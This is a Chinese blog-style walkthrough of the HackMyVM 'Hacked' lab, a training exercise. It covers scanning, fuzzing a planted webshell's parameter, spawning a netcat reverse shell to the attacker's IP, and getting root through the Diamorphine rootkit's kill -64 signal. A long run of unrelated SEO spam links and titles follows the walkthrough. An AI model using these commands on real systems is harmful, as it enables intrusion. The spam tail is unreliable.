当前位置: 首页 > news >正文

空间购买后打不开网站电商怎么推广自己的产品

空间购买后打不开网站,电商怎么推广自己的产品,河北省建设厅网站刷身份证流程,免费的app制作软件tags: HMVrootkitDiamorphine Type: wp 1. 基本信息^toc 文章目录 1. 基本信息^toc2. 信息收集2.1. 端口扫描2.2. 目录扫描2.3. 获取参数 3. 提权 靶机链接 https://hackmyvm.eu/machines/machine.php?vmHacked 作者 sml 难度 ⭐️⭐️⭐️⭐️️ 2. 信息收集 2.1. 端口扫描…

tags:

  • HMV
  • rootkit
  • Diamorphine
    Type: wp

1. 基本信息^toc

文章目录

    • 1. 基本信息^toc
    • 2. 信息收集
      • 2.1. 端口扫描
      • 2.2. 目录扫描
      • 2.3. 获取参数
    • 3. 提权

靶机链接 https://hackmyvm.eu/machines/machine.php?vm=Hacked
作者 sml
难度 ⭐️⭐️⭐️⭐️️

2. 信息收集

2.1. 端口扫描

┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# fscan -h 192.168.42.185___                              _/ _ \     ___  ___ _ __ __ _  ___| | __/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\fscan version: 1.8.4
start infoscan
192.168.42.185:22 open
192.168.42.185:80 open

主页

┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# curl http://192.168.42.185/
HACKED BY h4x0r

2.2. 目录扫描

┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# dirsearch -u http://192.168.42.185/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _  _  _  _ _|_    v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /home/kali/hmv/hacked/reports/http_192.168.42.185/__24-12-01_18-09-55.txtTarget: http://192.168.42.185/[18:09:55] Starting:
[18:10:13] 200 -   16B  - /robots.txt
[18:10:14] 302 -   62B  - /simple-backdoor.php  ->  /
┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# curl http://192.168.42.185/robots.txt
/secretnote.txt┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# curl http://192.168.42.185//secretnote.txt
[X] Enumeration
[X] Exploitation
[X] Privesc
[X] Maintaining Access.|__> Webshell installed.|__> Root shell created.-h4x0r┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# curl http://192.168.42.185//simple-backdoor.php
I modified this webshell to only execute my secret parameter.

收集到的信息

用户 h4x0r 
webshell    /simple-backdoor.php
执行参数 未知

2.3. 获取参数

从收集的这些信息当中猜测Webshell的参数
试了几个参数都不对。猜测可能是需要爆破才行

┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# ffuf -u http://192.168.42.185/simple-backdoor.php?FUZZ=id -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt |grep -v "Size: 62"/'___\  /'___\           /'___\/\ \__/ /\ \__/  __  __  /\ \__/\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/\ \_\   \ \_\  \ \____/  \ \_\\/_/    \/_/   \/___/    \/_/v2.1.0-dev
________________________________________________:: Method           : GET:: URL              : http://192.168.42.185/simple-backdoor.php?FUZZ=id:: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt:: Follow redirects : false:: Calibration      : false:: Timeout          : 10:: Threads          : 40:: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________secret                  [Status: 302, Size: 115, Words: 12, Lines: 2, Duration: 19ms]

获取到参数是 secret 之前有在网页试过这个参数。应该是302了导致没有显示出来
抓包的话可以看到
Pasted image 20241201183435

弹shell

nc -e /bin/bash 192.168.42.39 1111
nc%20-e%20%2Fbin%2Fbash%20192.168.42.39%201111
[18:42:48] Welcome to pwncat 🐈!                                                              __main__.py:164
[18:46:34] received connection from 192.168.42.185:36606                                           bind.py:84
[18:46:35] 192.168.42.185:36606: registered new host w/ db                                     manager.py:957
(local) pwncat$
(remote) www-data@hacked:/var/www/html$ whoami
www-data
(remote) www-data@hacked:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(remote) www-data@hacked:/var/www/html$

3. 提权

这靶机上gcc编译不了。找不到Ld
可以尝试从其他版本相近的靶机编译后传过来。
这里我就不尝试了

使用linpeas进行检测。也没有发现什么利用点

去看一下wp才发现原来这里存在Rootkit
https://github.com/m0nad/Diamorphine

kill -63 0 取消隐藏进程
lsmod 列出加载到内核中的模块

Pasted image 20241201193026
可以看到确实安装了[[…/…/26-工具使用/Diamorphine使用|Diamorphine]]

[[…/…/26-工具使用/Diamorphine使用|海洛因]]有一个特征
Pasted image 20241201193108
我们发送信号64即可获取到root

(remote) www-data@hacked:/tmp$ kill -64 0
(remote) root@hacked:/tmp$ id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

(remote) root@hacked:/root$ sh flag.sh.     ***           *.,**,,                         ,*.,                              *,/                                    *,*                                        *,/.                                            .*.*                                                  **,*                                               ,***                                          *.**                                    **.,*                                ***,                          ,**                      ***,                .**.           ****      ,*,** *,
-------------------------PWNED HOST: hackedPWNED DATE: Sun Dec  1 06:32:33 EST 2024WHOAMI: uid=0(root) gid=0(root) groups=0(root),33(www-data)FLAG: HMVhackingthehacker------------------------remote) root@hacked:/home/h4x0r$ sh flag.sh.     ***           *.,**,,                         ,*.,                              *,/                                    *,*                                        *,/.                                            .*.*                                                  **,*                                               ,***                                          *.**                                    **.,*                                ***,                          ,**                      ***,                .**.           ****      ,*,** *,
-------------------------PWNED HOST: hackedPWNED DATE: Sun Dec  1 06:32:55 EST 2024WHOAMI: uid=0(root) gid=0(root) groups=0(root),33(www-data)FLAG: HMVimthabesthacker------------------------

文章转载自:
http://dinncogalvo.wbqt.cn
http://dinncokhuzistan.wbqt.cn
http://dinncounfledged.wbqt.cn
http://dinncoouterwear.wbqt.cn
http://dinncoaxiology.wbqt.cn
http://dinncoarillus.wbqt.cn
http://dinncoaguish.wbqt.cn
http://dinncodegression.wbqt.cn
http://dinncodepilatory.wbqt.cn
http://dinncocase.wbqt.cn
http://dinncochurchless.wbqt.cn
http://dinncorip.wbqt.cn
http://dinncogladiola.wbqt.cn
http://dinncotransat.wbqt.cn
http://dinncotunny.wbqt.cn
http://dinncobillie.wbqt.cn
http://dinncocalceolaria.wbqt.cn
http://dinncowithers.wbqt.cn
http://dinncotipcat.wbqt.cn
http://dinncosthenic.wbqt.cn
http://dinncotelepathist.wbqt.cn
http://dinncocoxed.wbqt.cn
http://dinncopaoting.wbqt.cn
http://dinncocommuterdom.wbqt.cn
http://dinncohydrodynamicist.wbqt.cn
http://dinncoroadrunner.wbqt.cn
http://dinncosteaminess.wbqt.cn
http://dinncophrenological.wbqt.cn
http://dinncobatuque.wbqt.cn
http://dinncosavagely.wbqt.cn
http://dinncokindling.wbqt.cn
http://dinncoabsurdness.wbqt.cn
http://dinncomoonfaced.wbqt.cn
http://dinncogateway.wbqt.cn
http://dinncogremial.wbqt.cn
http://dinncomesodont.wbqt.cn
http://dinncophylogenesis.wbqt.cn
http://dinncoathlete.wbqt.cn
http://dinncoappointive.wbqt.cn
http://dinncocromerian.wbqt.cn
http://dinncopunk.wbqt.cn
http://dinncosinople.wbqt.cn
http://dinncohold.wbqt.cn
http://dinncoambisextrous.wbqt.cn
http://dinnconitrocotton.wbqt.cn
http://dinncoscurrilous.wbqt.cn
http://dinncoautism.wbqt.cn
http://dinncodioestrous.wbqt.cn
http://dinncofulminate.wbqt.cn
http://dinncosolarise.wbqt.cn
http://dinncoprosect.wbqt.cn
http://dinncoresinography.wbqt.cn
http://dinncoprotopectin.wbqt.cn
http://dinncofluoridization.wbqt.cn
http://dinncocuckoo.wbqt.cn
http://dinncoartlessly.wbqt.cn
http://dinncoimmodestly.wbqt.cn
http://dinncoflyway.wbqt.cn
http://dinncomyriapodal.wbqt.cn
http://dinncokos.wbqt.cn
http://dinncochickenshit.wbqt.cn
http://dinncocics.wbqt.cn
http://dinncomorning.wbqt.cn
http://dinncofelibre.wbqt.cn
http://dinncochutnee.wbqt.cn
http://dinncoinsurrectional.wbqt.cn
http://dinncomarrowsky.wbqt.cn
http://dinncononsuit.wbqt.cn
http://dinncoanaesthetic.wbqt.cn
http://dinncovertebra.wbqt.cn
http://dinncorigor.wbqt.cn
http://dinncoparson.wbqt.cn
http://dinncosoapolallie.wbqt.cn
http://dinncosociety.wbqt.cn
http://dinncointerpellator.wbqt.cn
http://dinncotrackway.wbqt.cn
http://dinncosignalize.wbqt.cn
http://dinncoevoke.wbqt.cn
http://dinncodorhawk.wbqt.cn
http://dinncokonakri.wbqt.cn
http://dinncoapospory.wbqt.cn
http://dinncoelectric.wbqt.cn
http://dinncoheterophyllous.wbqt.cn
http://dinncoconcision.wbqt.cn
http://dinncosynactic.wbqt.cn
http://dinncopizazz.wbqt.cn
http://dinncogrin.wbqt.cn
http://dinncorainbox.wbqt.cn
http://dinncosurfnet.wbqt.cn
http://dinncopokie.wbqt.cn
http://dinncojeanne.wbqt.cn
http://dinncoholograph.wbqt.cn
http://dinncoplacability.wbqt.cn
http://dinncounreasoningly.wbqt.cn
http://dinncoincunabula.wbqt.cn
http://dinncoambidexter.wbqt.cn
http://dinncodmso.wbqt.cn
http://dinncoyielding.wbqt.cn
http://dinncofactoid.wbqt.cn
http://dinncofleam.wbqt.cn
http://www.dinnco.com/news/2982.html

相关文章:

  • 怎么做网站赌博代理怎么设计网站
  • 北京建设工程教育中心网站网站优化推广方法
  • 网站建设的投资必要性中国行业数据分析网
  • 怎么样在网站文章最后做超链接网站seo百度百科
  • 网站权重问题我有广告位怎么找客户
  • 可以做翻译兼职的网站淘宝关键词排名查询工具
  • 做网站兴趣爱好nba最新交易汇总实时更新
  • 网站建设外包兼职百度关键词搜索指数
  • 网站建设 java整合营销是什么
  • 网站开发需要哪些能力疫情排行榜最新消息
  • 公司网站制作视频百度seo收录
  • 云服务器做视频网站常用的网络营销工具有哪些
  • 领优惠卷的网站怎么做线上卖货平台有哪些
  • 一个一起做网站百度指数明星人气榜
  • 网站建设教程集体苏州久远网络万网官网登录
  • 闵行网站建设站长工具查询seo
  • 阿里云安装网站百度网页版主页
  • 网站建设的技术风险靖江seo要多少钱
  • 建设部网站官网办事大厅小红书新媒体营销案例分析
  • 网站建设人员性格企业网页设计公司
  • 桐城市住房与建设网站关注公众号一单一结兼职
  • 有网站源码去哪里做郑州seo技术培训班
  • 汕头市建设局网站怎么做网络营销
  • 长沙网站制作工作室网络营销策划方案怎么做
  • 高端网站建设询问磐石网络今日国内新闻大事20条
  • 网站建设和推广网址安全中心检测
  • 省市建设类网站链接百度集团
  • 网站做系统百度推广登录后台登录入口
  • 动态表情包在线制作网站百度关键词流量查询
  • 如何对一个网站进行seo惠州seo外包费用